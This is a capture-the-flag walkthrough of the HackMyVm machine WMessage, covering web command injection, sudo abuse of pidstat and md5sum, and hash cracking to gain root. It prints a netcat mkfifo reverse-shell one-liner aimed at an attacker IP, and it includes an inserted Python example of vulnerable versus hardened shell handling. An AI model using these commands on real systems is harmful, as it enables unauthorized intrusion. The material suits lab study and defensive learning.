HackMyVm: WMessage
Today we are going to take a look at WMessage on HackMyVm: https://hackmyvm.eu/machines/machine.php?vm=WMessage
As usual, we will start off with an Nmap scan:
Alright, easy day: just 2 ports open. Going over to port 80 we see the following:
We can sign up, and after we do we can log in:
Looks like we can run a command within the messages, so let's see if we can use a | or ; to get some command injection. We will first check whether we can make the target ping us, listening for the ICMP requests with tcpdump:
Now send the message, note you may have to refresh the page:
Awesome, we have command injection, which means we should be able to get a reverse shell. We will use a nc mkfifo reverse shell as shown below:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR IP HERE> 4242 >/tmp/f
We have our listener up and running, and once we click send message we get a reverse shell:
When we get on the system I always like to try sudo -l, even as www-data, and here we get a hit.
Alright, it looks like we can run pidstat. I also notice we have something called ROOTPASS, which we will keep in mind for later. Looking on GTFOBins we find the following for pidstat:
We may be able to drop a bash reverse shell in /tmp and then run pidstat:
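The injection above works because the application pastes the message text into a shell command line. As an added illustration (not the WMessage application's code, whose source is not shown in this writeup), here is a hypothetical Python reconstruction of the vulnerable pattern beside a hardened version that validates the ping target and never hands user input to a shell; the function names and the ping use case are assumptions:

```python
import ipaddress
import subprocess


def build_ping_unsafe(target: str) -> str:
    """Vulnerable pattern (hypothetical): user text is concatenated into a
    string that will be handed to /bin/sh, so ';' or '|' in the message
    starts a second command chosen by the sender."""
    return "ping -c 1 " + target  # never build shell commands this way


def parse_ping_target(target: str) -> list:
    """Hardened variant: accept only a literal IPv4/IPv6 address and return
    an argv list, so nothing the user typed is ever parsed by a shell."""
    try:
        addr = ipaddress.ip_address(target.strip())
    except ValueError as exc:
        raise ValueError(f"rejected ping target: {target!r}") from exc
    return ["ping", "-c", "1", str(addr)]


def run_ping_safe(target: str) -> int:
    """Runs the validated argv with shell=False: execve receives the list
    directly and no metacharacter expansion can happen."""
    argv = parse_ping_target(target)
    return subprocess.run(argv, shell=False, capture_output=True,
                          check=False).returncode


def flag_injection(message: str) -> bool:
    """Detection helper for request logs: shell metacharacters have no place
    in a field that is supposed to hold a host address."""
    return any(ch in message for ch in ";|&`$\n")


if __name__ == "__main__":
    # Constructed sample inputs: one honest address, one with a chained command.
    for msg in ("10.0.0.5", "10.0.0.5; id"):
        print("unsafe command line:", build_ping_unsafe(msg))
        print("flagged:", flag_injection(msg))
        try:
            print("hardened argv:", parse_ping_target(msg))
        except ValueError as err:
            print("hardened:", err)
```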
With our listener running we get a reverse shell with messagemaster:
We can see that we get a callback. Let's do another sudo -l:
Now we can run md5sum. Remember that ROOTPASS we saw at the beginning? Let's MD5 that and then crack it:
From here things get very interesting. I was not able to crack this hash with either John the Ripper or hashcat; however, I was able to create a python3 script that cracked it. The script that I created can be found here:
Now let's copy that hash and put it into our script:
We found a match, we can now use that password to su into root:
Hopefully you enjoyed the writeup and learned something new along the way.